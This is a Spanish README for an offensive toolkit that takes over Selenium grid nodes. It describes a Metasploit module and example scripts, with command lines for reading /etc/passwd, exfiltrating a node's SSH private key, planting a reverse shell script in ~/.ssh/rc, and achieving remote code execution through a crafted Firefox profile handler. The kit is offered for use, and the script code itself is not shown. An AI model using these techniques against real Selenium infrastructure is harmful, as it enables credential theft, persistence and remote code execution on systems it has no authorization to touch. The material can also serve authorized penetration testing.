
Una colección de pruebas de selenium que podrían ayudar a tomar el control de un nodo de selenium
Este proyecto se ha movido. Para obtener la última versión, haga pull desde https://codeberg.org/JonStratton/selenium-node-takeover-kit
Esto combina algunos de los ejemplos siguientes para subir archivos a, descargar archivos de, y ejecutar código en un nodo Selenium (a través del parámetro "COMMAND_TYPE"). El RCE actualmente solo funciona en Linux. Para instalarlo, copie esto a "~/.msf4/modules/exploits/multi/http/" o lo que corresponda.
Esto simplemente navega a la URL "file:" y vuelca el contenido de la página.
examples/selenium_node_cat.py -h http://selenium-hub.lan:4444/wd/hub -r /etc/passwdEsto utiliza HTML en línea para crear un formulario en línea con una entrada de carga de archivos. A continuación, envía una ubicación de archivo local a este formulario. El código Java-script en este formulario incrusta este archivo codificado en base64 en la misma página. Luego, los scripts lo leen y decodifican, y lo guardan en un archivo local.
examples/selenium_node_download.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/id_rsa -l ./nodes_rsaComo los scripts de Node Download, pero sin molestarse en procesar el archivo en Java-script. Si el archivo no existe, el script, el send_keys() lanzará una excepción.
Solo Firefox. Utiliza un perfil de Firefox (que es solo un archivo zip codificado en base64 incrustado en una llamada a la API de Selenium) para crear un manejador personalizado ("application/sh" a /bin/sh en este caso). Luego codifica en base64 algunos comandos de shell y utiliza "data:" en línea para pasar comandos asociados con "application/sh". Firefox creará entonces un archivo temporal con los comandos y lo ejecutará con sh.
Solo Firefox. Utiliza un perfil de Firefox para establecer un directorio de descarga personalizado y desactivar el mensaje "Guardar como". Luego navega a HTML en línea con un enlace "data:" incrustado que es el archivo codificado a subir. A continuación, se hace clic en este enlace.
examples/selenium_node_upload.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/rc -l ./reverse_shell.shSolo Firefox. Utiliza un perfil de Firefox, que no se descomprime de forma segura, para escribir un archivo en el sistema de archivos del nodo.